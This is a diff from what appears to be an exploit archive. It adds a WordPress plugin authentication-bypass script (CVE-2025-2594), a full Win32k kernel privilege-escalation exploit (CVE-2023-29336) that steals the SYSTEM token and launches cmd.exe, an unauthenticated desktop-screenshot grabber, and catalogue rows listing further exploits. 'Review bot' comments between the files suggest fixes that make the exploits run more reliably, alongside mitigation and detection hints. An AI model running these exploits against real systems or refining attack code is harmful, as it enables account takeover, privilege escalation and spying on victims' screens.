@@ -0,0 +1,65 @@ +#!/usr/bin/env python3 +# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass +# Date: 2025-05-22 +# Exploit Author: Mohammed Idrees Banyamer +# Vendor Homepage: https://wordpress.org/plugins/user-registration/ +# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip +# Version: <= 4.1.2 +# Tested on: WordPress 6.x, Apache on Linux +# CVE: CVE-2025-2594 + +import requests +import sys +import argparse +from urllib.parse import urljoin +from termcolor import cprint, colored + +def banner(): + cprint("┌──────────────────────────────────────────────┐", "cyan") + cprint("│ WordPress Plugin User Registration <= 4.1.2 │", "cyan") + cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan") + cprint("│ Author: Mohammed Idrees Banyamer │", "cyan") + cprint("└──────────────────────────────────────────────┘", "cyan") + +def exploit(target_url, member_id, nonce): + endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php") + + files = { + 'action': (None, 'user_registration_membership_confirm_payment'), + 'security': (None, nonce), + 'form_response': (None, '{"auto_login": true}'), + 'member_id': (None, str(member_id)) + } + + cprint(f"[+] Target URL: {endpoint}", "yellow") + cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow") + + try: + response = requests.post(endpoint, files=files, timeout=10) + + if response.status_code == 200 and '"success":true' in response.text: + cprint("[✓] Exploit successful! Authentication bypass achieved.", "green") + cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green") + print("Server Response:") + print(response.text) + else: + cprint("[-] Exploit failed or invalid nonce/member_id.", "red") + print("Server Response:") + print(response.text) + except requests.exceptions.RequestException as e: + cprint(f"[!] 
Request failed: {e}", "red") + +def main(): + banner() + + parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass") + parser.add_argument("target", help="Base target URL (e.g., http://localhost)") + parser.add_argument("member_id", help="Target user ID (usually 1 for admin)") + parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page") + + args = parser.parse_args() + + exploit(args.target, args.member_id, args.nonce) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/52301.c b/exploits/windows/local/52301.c new file mode 100644 index 000000000..95a2a6109 --- /dev/null +++ b/exploits/windows/local/52301.c 
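Review bot: `import sys` is unused in this hunk, and the third-party `termcolor` dependency the script needs at import time is not declared in the header block alongside the other metadata; a `# Requirements: requests, termcolor` line would save the first run from an ImportError. `member_id` is taken as a bare string and only passed through `str()`, so `parser.add_argument("member_id", type=int, help="Target user ID (usually 1 for admin)")` would reject non-numeric input before any request is made. On the defensive side, the header scopes the issue to plugin versions <= 4.1.2, so running a later release is the fix, and the request this script builds — a multipart POST to `admin-ajax.php` with no session cookie, action `user_registration_membership_confirm_payment` and a `form_response` of `{"auto_login": true}` — is a precise pattern to alert on in web logs.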
@@ -0,0 +1,623 @@ +# Exploit Title: Microsoft Windows Server 2016 - Win32k Elevation of +Privilege +# Date: 2025-05-19 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# Country: United Kingdom +# CVE : CVE-2023-29336 + + + + +#include +#include +#include + +#define IDM_MYMENU 101 +#define IDM_EXIT 102 +#define IDM_DISABLE 0xf120 +#define IDM_ENABLE 104 +#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440 +#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448 +#define EPROCESS_TOKEN_OFFSET 0x4b8 + +typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT +uIDEnableItem, UINT uEnable); + +typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, +unsigned __int64 a3, unsigned int a4); +typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2); +typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, +int nConsoleInformationLength); + + +NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL; +NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL; +NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL; +fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr; +LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM +lParam); +int syytem(); +typedef struct _SHELLCODE { + DWORD reserved; + DWORD pid; + DWORD off_THREADINFO_ppi; + DWORD off_EPROCESS_ActiveLink; + DWORD off_EPROCESS_Token; + BOOL bExploited; + BYTE pfnWindProc[]; +} SHELLCODE, * PSHELLCODE; +struct tagMENU +{ + ULONG64 field_0; + ULONG64 field_8; + ULONG64 field_10; + ULONG64 field_18; + ULONG64 field_20; + PVOID obj28; + DWORD field_30; + DWORD flag1; + DWORD flag2; + DWORD cxMenu; + DWORD cyMenu; + ULONG64 field_48; + PVOID rgItems; + ULONG64 field_58; // + 0x58 + ULONG64 field_60; + ULONG64 field_68; + ULONG64 field_70; + ULONG64 field_78; + ULONG64 field_80; + ULONG64 field_88; + ULONG64 field_90; + PVOID ref; // + 0x98 +}; +struct MyData +{ + 
BYTE name[0x96]; +}; +tagMENU* g_pFakeMenu = 0; +static PSHELLCODE pvShellCode = NULL; +HMENU hSystemMenu; +HMENU hMenu; +HMENU hSubMenu; +HMENU hAddedSubMenu; +HMENU hMenuB; +PVOID MENU_add = 0; +DWORD flag = 0; +UINT iWindowCount = 0x100; +HWND HWND_list[0x300]; +HWND HWND_list1[0x20]; +HMENU HMENUL_list[0x300]; +int Hwnd_num = 0; +int Hwnd_num1 = 0; +ULONGLONG HWND_add = 0; +ULONGLONG GS_off = 0; +WORD max = 0; + +static PULONGLONG ptagWNDFake = NULL; +static PULONGLONG ptagWNDFake1 = NULL; +static PULONGLONG ptagWNDFake2 = NULL; + +static PULONGLONG GS_hanlde = NULL; + +static PULONGLONG HWND_class = NULL; + + +struct ThreadParams { + int threadId; + int numLoops; +}; + + +static unsigned long long GetGsValue(unsigned long long gsValue) +{ + return gsValue; +} +PVOID +GetMenuHandle(HMENU menu_D) +{ + int conut = 0; + PVOID HANDLE = 0; + PBYTE add = 0; + WORD temp = 0; + DWORD offset = 0xbd688; + HMODULE hModule = LoadLibraryA("USER32.DLL"); + + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + ULONGLONG par1 = 0; + DWORD par2 = 0; + memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); + memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); + + add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); + + if (add) + { + HANDLE = *(PVOID*)add; + } + else + { + HANDLE = 0; + } + HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20); + return *(PVOID*)HANDLE; + +} + +PVOID +xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde) +{ + int conut = 0; + PVOID HANDLE = 0; + PBYTE add = 0; + WORD temp = 0; + DWORD offset = 0xbd688; + HMODULE hModule = LoadLibraryA("USER32.DLL"); + + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + ULONGLONG par1 = 0; + DWORD par2 = 0; + memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); + memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); + + temp = (ULONGLONG)menu_D >> 16; + add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); + if (add) + { + HANDLE = *(PVOID*)add; + } + 
else + { + HANDLE = 0; + } + HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20); + return *(PVOID*)HANDLE; + +} + + +static +VOID +xxReallocPopupMenu(VOID) +{ + for (INT i = 0; i < 0x8; i++) + { + WNDCLASSEXW Class = { 0 }; + WCHAR szTemp[0x100] = { 0 }; + HWND hwnd = NULL; + wsprintfW(szTemp, +L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d", +i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + if (!RegisterClassExW(&Class)) + { + continue; + } + } + +} +VOID +createclass(VOID) +{ + WCHAR szTemp[0x100] = { 0 }; + for (INT i = 9; i < 29; i++) + { + WNDCLASSEXW Class = { 0 }; + + HWND hwnd = NULL; + wsprintfW(szTemp, L"A@A%d", i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0x20; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + Class.cbClsExtra = 0x1a0; + if (!RegisterClassExW(&Class)) + { + continue; + } + } + + for (INT i = 9; i < 29; i++) + { + wsprintfW(szTemp, L"A@A%d", i); + HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, +0, 0, NULL,NULL, NULL, NULL); + + + } + +} + +ULONG64 Read64(ULONG64 address) +{ + MENUBARINFO mbi = { 0 }; + mbi.cbSize = sizeof(MENUBARINFO); + + g_pFakeMenu->rgItems = PVOID(address - 0x48); + GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi); + + return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32); +} +void exploit() +{ + for (int i = 0; i < 0x20; i++) + { + + ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, +(LONG_PTR)g_pFakeMenu); + if (pmenu != 0) + { + Hwnd_num = i; + MENUBARINFO mbi = { 0 }; + mbi.cbSize = sizeof(MENUBARINFO); + + + + } + } + + + // Token stealing + ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO + p = Read64(p); //THREADINFO + p = Read64(p + 0x220); // 
(PROCESSINFO) + + ULONG64 eprocess = p; + printf("Current EPROCESS = %llx\n", eprocess); + p = Read64(p + 0x2f0); + + do { + + p = Read64(p + 0x08); + ULONG64 pid = Read64(p - 0x08); + if (pid == 4) { + + ULONG64 pSystemToken = Read64(p + 0x68); + printf("pSys/tem Token = %llx \n", pSystemToken); + + HWND_class = (PULONGLONG)((PBYTE)0x303000); + HWND_class[8] = eprocess + 0x290; + HWND_class[12] = 0x100; + HWND_class[20] = 0x303010; + + ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + +0x98 - 0xa0, (LONG_PTR)HWND_class); + SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken); + ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - +0xa0, (LONG_PTR)ret_add); + + break; + } + } while (p != eprocess); + syytem(); +} + + +void buildmem() +{ + + WORD max_handle = 0; + pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, +MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (pvShellCode == NULL) + { + return; + } + ZeroMemory(pvShellCode, 0x10000); + + + + ptagWNDFake = (PULONGLONG)((PBYTE)0x304140); + ptagWNDFake[0] = (ULONGLONG)0x304140; + + ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10; + + + + ptagWNDFake[6] = (ULONGLONG)0x304140; + ptagWNDFake[8] = 0x305300; + + ptagWNDFake[11] = (ULONGLONG)MENU_add; + ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230; + ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28; + ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30; + ptagWNDFake[71] = (ULONGLONG)0x000004; + + + ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300); + ptagWNDFake1[1] = (ULONGLONG)0x11; + ptagWNDFake1[2] = (ULONGLONG)0x305320; + ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000; + ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000; + ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; + + + ptagWNDFake1[14] = (ULONGLONG)0x306500; + ptagWNDFake1[16] = (ULONGLONG)305400; + + + ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500); + ptagWNDFake1[11] = (ULONGLONG)0x306600; + + + + WNDCLASSEX WndClass = { 0 }; + WndClass.cbSize = sizeof(WNDCLASSEX); + 
WndClass.lpfnWndProc = DefWindowProc; + WndClass.style = CS_VREDRAW | CS_HREDRAW; + WndClass.cbWndExtra = 0xe0; + WndClass.hInstance = NULL; + WndClass.lpszMenuName = NULL; + WndClass.lpszClassName = L"NormalClass"; + + RegisterClassEx(&WndClass); + + for (int i = 0; i < 0x200; i++) + { + HMENUL_list[i] = CreateMenu(); + } + for (int i = 0; i < 0x100; i++) + { + HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, +WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL); + + } + for (int i = 0; i < 0x100; i++) + { + + + SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000); + + SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000); + + } + + + for (int i = 0x20; i < 0x60; i++) + { + if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], +0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], +0x01)== 0x250) + { + if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + +1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) +== 0x250) + { + HWND_add = +(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01); + max = i * 2; + break; + } + } + if (i == 0x5f) + { + HWND_add = 0; + } + + } + + ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; + + + DestroyWindow(HWND_list[max]); + + createclass(); + + + + // Create a fake spmenu + PVOID hHeap = (PVOID)0x302000; + + g_pFakeMenu = (tagMENU*)(PVOID)0x302000; + g_pFakeMenu->ref = (PVOID)0x302300; + *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu; + // cItems = 1 + g_pFakeMenu->obj28 = (PVOID)0x302200; + *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1; + // rgItems + g_pFakeMenu->rgItems = (PVOID)0x304000; + // cx / cy must > 0 + g_pFakeMenu->flag1 = 1; + g_pFakeMenu->flag2 = 1; + g_pFakeMenu->cxMenu = 1; + g_pFakeMenu->cyMenu = 1; + + + // + +} +int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR +lpCmdLine, int nCmdShow) +{ + ULONGLONG gsValue = 0; + unsigned char shellcode[] = 
+"\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3"; + + LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), +MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (executableMemory == NULL) { + return 1; + } + memcpy(executableMemory, shellcode, sizeof(shellcode)); + + gsValue = ((ULONGLONG(*)())executableMemory)(); + gsValue = gsValue + 0x800; + GS_hanlde = (PULONGLONG)(PBYTE)gsValue; + GS_off = GS_hanlde[5]; + + char str[0xb8] = ""; + memset(str, 0x41, 0xa8); + g_NtUserEnableMenuItem = +(NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserEnableMenuItem"); + g_NtUserSetClassLongPtr = +(NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserSetClassLongPtr"); + g_NtUserCreateAcceleratorTable = +(NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserCreateAcceleratorTable"); + g_pfnNtUserConsoleControl = +(fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserConsoleControl"); + + WNDCLASS wc = { 0 }; + + wc.lpfnWndProc = WndProc; + wc.hInstance = hInstance; + wc.lpszClassName = TEXT("EnableMenuItem"); + + RegisterClass(&wc); + + HWND hWnd = CreateWindow( + wc.lpszClassName, + TEXT("EnableMenuItem"), + WS_OVERLAPPEDWINDOW, + CW_USEDEFAULT, + CW_USEDEFAULT, + 400, 300, + NULL, + NULL, + hInstance, + NULL + ); + + if (!hWnd) return FALSE; + + /// + + + hSystemMenu = GetSystemMenu(hWnd, FALSE); + + hSubMenu = CreatePopupMenu(); + MENU_add = GetMenuHandle(hSubMenu); + hMenuB = CreateMenu(); + + buildmem(); + if (HWND_add == 0) + { + return 0; + } + + + AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0")); + AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1")); + + DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND); + + AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A"); + + AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B"); + + + + ShowWindow(hWnd, nCmdShow); + UpdateWindow(hWnd); + + flag = 1; + 
g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01); + + exploit(); + + MSG msg = { 0 }; + + while (GetMessage(&msg, NULL, 0, 0)) + { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + + return (int)msg.wParam; +} + +LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM +lParam) +{ + switch (message) + { + case WM_DESTROY: + PostQuitMessage(0); + return 0; + case 0xae: + switch (wParam) + { + case 0x1000: + if (flag) + { + int itemCount = GetMenuItemCount(hMenuB); + + for (int i = itemCount - 1; i >= 0; i--) { + RemoveMenu(hMenuB, i, MF_BYPOSITION); + } + DestroyMenu(hSubMenu); + xxReallocPopupMenu(); + } + case 0x1001: + if (flag) + { + int itemCount = GetMenuItemCount(hMenuB); + + for (int i = itemCount - 1; i >= 0; i--) { + RemoveMenu(hMenuB, i, MF_BYPOSITION); + } + DestroyMenu(hSubMenu); + xxReallocPopupMenu(); + } + + return 0; + } + break; + + + } + + return DefWindowProc(hWnd, message, wParam, lParam); +} +int syytem() +{ + SECURITY_ATTRIBUTES sa; + HANDLE hRead, hWrite; + byte buf[40960] = { 0 }; + STARTUPINFOW si; + PROCESS_INFORMATION pi; + DWORD bytesRead; + RtlSecureZeroMemory(&si, sizeof(si)); + RtlSecureZeroMemory(&pi, sizeof(pi)); + RtlSecureZeroMemory(&sa, sizeof(sa)); + int br = 0; + sa.nLength = sizeof(SECURITY_ATTRIBUTES); + sa.lpSecurityDescriptor = NULL; + sa.bInheritHandle = TRUE; + if (!CreatePipe(&hRead, &hWrite, &sa, 0)) + { + return -3; + } + + si.cb = sizeof(STARTUPINFO); + GetStartupInfoW(&si); + si.hStdError = hWrite; + si.hStdOutput = hWrite; + si.wShowWindow = SW_HIDE; + si.lpDesktop = L"WinSta0\\Default"; + si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; + wchar_t cmd[4096] = { L"cmd.exe" }; + + if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, +&pi)) + { + CloseHandle(hWrite); + CloseHandle(hRead); + printf("[!] CreateProcessW Failed![%lx]\n", GetLastError()); + return -2; + } + CloseHandle(hWrite); + +} \ No newline at end of file 
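Review bot: `syytem()` is declared `int` but falls off the end after `CloseHandle(hWrite)` on the success path — undefined behaviour in C++ and, in C, as soon as a caller uses the value — and it also leaks `hRead`, `pi.hProcess` and `pi.hThread`; finish with `CloseHandle(hRead); CloseHandle(pi.hThread); CloseHandle(pi.hProcess);` followed by `return 0;`. The 40960-byte `buf`, `bytesRead` and `br` locals in that function are never used, and `buf` alone is a sizeable stack frame for nothing. The file is committed under `exploits/windows/local/52301.c` but is C++ — `nullptr`, the functional cast `PVOID(address - 0x48)`, and `tagMENU*` used without the `struct` tag — so either the extension or the constructs should change for the listing to be an accurate record. On the defensive side the header ties this to CVE-2023-29336, so the vendor update for that CVE is the mitigation; the chain ends in `CreateProcessW` launching `cmd.exe` with inherited pipe handles from a GUI process whose window class is "EnableMenuItem", which is the kind of parent/child pair process-creation telemetry should surface.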
diff --git a/exploits/windows/remote/52300.py b/exploits/windows/remote/52300.py new file mode 100755 index 000000000..82f027873 --- /dev/null +++ b/exploits/windows/remote/52300.py @@ -0,0 +1,61 @@ +# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture +# Date: 2025-05-19 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://rs.ltd +# Software Link: https://rs.ltd/latest.php?os=win +# Version: 2024.15 +# Tested on: Windows 10/11 with Remote for Windows (helper) + +''' +Description: +- Exploits the getScreenshot API endpoint in Remote for Windows helper +service +- Works when "Allow unknown devices" setting is enabled (default: disabled) +- Captures current desktop including login screens (SYSTEM-level access) + +Vulnerable Component: +- /api/getScreenshot endpoint with missing authentication checks + + +# Identification: +nmap -p- -T4 --script ssl-cert +Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US +''' + +#!/usr/bin/env python3 + +import requests +import sys +from urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +def capture_screenshot(ip, port, output_file): + try: + response = requests.get( + f"https://{ip}:{port}/api/getScreenshot", + headers={ + "X-ClientToken": "exploit", + "X-HostName": "attacker-pc", + "X-HostFullModel": "exploit-device" + }, + verify=False, + timeout=15 + ) + if response.status_code == 200 and +response.content.startswith(b'\xff\xd8'): + with open(output_file, 'wb') as f: + f.write(response.content) + print(f"[+] Saved: {output_file}") + return True + print(f"[-] Failed: HTTP {response.status_code}") + return False + except Exception as e: + print(f"[-] Error: {str(e)}") + return False + +if __name__ == "__main__": + if len(sys.argv) < 4: + print(f"Usage: {sys.argv[0]} ") + sys.exit(1) + sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3]) +else 1) \ No newline at end of file 
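Review bot: The `#!/usr/bin/env python3` line sits after the header comments and the docstring, so it is an ordinary comment there and the script is not directly executable despite the `100755` mode; move it to line 1. The usage message `print(f"Usage: {sys.argv[0]} ")` prints nothing after the program name — the argument placeholders appear to have been lost in transport — and `print(f"Usage: {sys.argv[0]} <ip> <port> <output_file>")` matches the three positionals `capture_screenshot` takes. On the defensive side the docstring itself names the control: the endpoint only answers this way when "Allow unknown devices" is enabled, which the text says is off by default, so keeping it off is the mitigation, and unauthenticated `GET /api/getScreenshot` requests carrying the fixed `X-ClientToken: exploit` / `X-HostName: attacker-pc` headers are the thing to watch for in the helper's logs.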
diff --git a/files_exploits.csv b/files_exploits.csv index 937480489..29175d14f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5550,6 +5550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33254,exploits/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,webapps,java,,2009-09-23,2014-05-09,1,CVE-2009-3469;OSVDB-58320,,,,,https://www.securityfocus.com/bid/36513/info 31438,exploits/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,webapps,java,,2008-03-19,2014-02-06,1,CVE-2007-4592;OSVDB-43356,,,,,https://www.securityfocus.com/bid/28296/info 36299,exploits/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",webapps,java,,2011-11-11,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50646/info +52304,exploits/java/webapps/52304.py,"Java-springboot-codebase 1.1 - Arbitrary File Read",2025-05-25,d3sca,webapps,java,,2025-05-25,2025-05-25,0,CVE-2025-46822,,,,, 36971,exploits/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,webapps,java,,2012-03-18,2015-05-09,1,,,,,,https://www.securityfocus.com/bid/52545/info 36828,exploits/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,webapps,java,,2012-02-17,2015-04-27,1,,,,,,https://www.securityfocus.com/bid/52060/info 37033,exploits/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",webapps,java,,2012-04-02,2015-05-17,1,,,,,,https://www.securityfocus.com/bid/52845/info 
@@ -10425,6 +10426,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,, 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,, 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,, +52306,exploits/multiple/local/52306.txt,"ABB Cylon Aspect Studio 3.08.03 - Binary Planting",2025-05-25,LiquidWorm,local,multiple,,2025-05-25,2025-05-25,0,CVE-2024-13946,,,,, 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,, 30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String",2014-01-03,LiquidWorm,local,multiple,,2014-01-07,2014-01-07,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php 19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple,,2012-06-14,2012-06-14,0,OSVDB-81754;CVE-2012-0780,,,,, 
@@ -10619,6 +10621,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22327,exploits/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,remote,multiple,,2003-03-05,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/7021/info 31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info 32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info +52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, 25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info 25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info 32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info 
@@ -10994,6 +10997,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19903,exploits/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",remote,multiple,,2000-05-05,2012-07-17,1,CVE-2000-0381;OSVDB-306,,,,,https://www.securityfocus.com/bid/1178/info 39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info 39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info +52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,, 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes 